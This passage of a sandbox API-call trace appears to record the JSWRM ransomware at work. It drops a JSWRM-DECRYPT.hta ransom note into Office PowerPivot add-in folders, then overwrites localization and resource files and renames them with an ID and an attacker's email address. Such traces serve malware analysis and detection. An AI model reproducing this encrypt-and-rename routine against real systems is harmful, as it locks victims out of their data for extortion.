add-in\\he\\jswrm-decrypt.hta")) returned 0xffffffff [0126.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.580] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.580] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.581] CloseHandle (hObject=0x314) returned 1 [0126.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\jswrm-decrypt.hta")) returned 0x20 [0126.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x421c7833, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0126.582] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x421c7833, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.582] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x421c7833, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x421c7833, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x421c7833, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.582] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16710914, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ad, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.582] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4781) returned 1 [0126.582] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.583] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x12a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x12a0, lpOverlapped=0x0) returned 1 [0126.584] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.584] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x12a0, lpOverlapped=0x0) returned 1 [0126.584] CloseHandle (hObject=0x338) returned 1 [0126.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.590] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.590] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.591] CloseHandle (hObject=0x314) returned 1 [0126.592] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.592] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1780, lpOverlapped=0x0) returned 1 [0126.594] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.594] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1780, lpOverlapped=0x0) returned 1 [0126.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hi\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hi\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hi\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hi\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.597] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.598] CloseHandle (hObject=0x314) returned 1 [0126.599] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.599] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x10d0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x10d0, lpOverlapped=0x0) returned 1 [0126.601] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.601] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x10d0, lpOverlapped=0x0) returned 1 [0126.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hr\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hr\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hr\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hr\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.606] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.606] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.608] CloseHandle (hObject=0x314) returned 1 [0126.609] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.609] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1150, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1150, lpOverlapped=0x0) returned 1 [0126.610] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.610] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1150, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1150, lpOverlapped=0x0) returned 1 [0126.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hu\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hu\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hu\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hu\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.613] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.615] CloseHandle (hObject=0x314) returned 1 [0126.615] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.615] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1090, lpOverlapped=0x0) returned 1 [0126.618] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.618] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1090, lpOverlapped=0x0) returned 1 [0126.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\id\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\id\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\id\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\id\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.621] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.622] CloseHandle (hObject=0x314) returned 1 [0126.623] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.623] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x10c0, lpOverlapped=0x0) returned 1 [0126.625] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.625] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x10c0, lpOverlapped=0x0) returned 1 [0126.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\it\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\it\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\it\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\it\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.628] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.628] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.630] CloseHandle (hObject=0x314) returned 1 [0126.630] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.630] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1000, lpOverlapped=0x0) returned 1 [0126.632] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.633] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1000, lpOverlapped=0x0) returned 1 [0126.633] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ja\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ja\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ja\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ja\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.636] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.636] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.638] CloseHandle (hObject=0x314) returned 1 [0126.638] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.638] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x14c0, lpOverlapped=0x0) returned 1 [0126.640] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.640] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x14c0, lpOverlapped=0x0) returned 1 [0126.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\kk\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\kk\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\kk\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\kk\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.643] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.644] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.645] CloseHandle (hObject=0x314) returned 1 [0126.645] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.645] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0xfd0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0xfd0, lpOverlapped=0x0) returned 1 [0126.649] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.649] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0xfd0, lpOverlapped=0x0) returned 1 [0126.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ko\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ko\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ko\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ko\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.652] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.652] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.653] CloseHandle (hObject=0x314) returned 1 [0126.654] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.654] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1110, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1110, lpOverlapped=0x0) returned 1 [0126.666] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.666] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1110, lpOverlapped=0x0) returned 1 [0126.666] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lt\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lt\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lt\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lt\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.669] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.669] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.670] CloseHandle (hObject=0x314) returned 1 [0126.671] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.671] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1190, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1190, lpOverlapped=0x0) returned 1 [0126.672] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.672] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1190, lpOverlapped=0x0) returned 1 [0126.673] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lv\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lv\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lv\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lv\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.675] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0126.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.688] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0126.689] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Modeler.UI.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.modeler.ui.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Modeler.UI.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.modeler.ui.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.690] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2=".") returned 1 [0126.690] lstrcmpiW 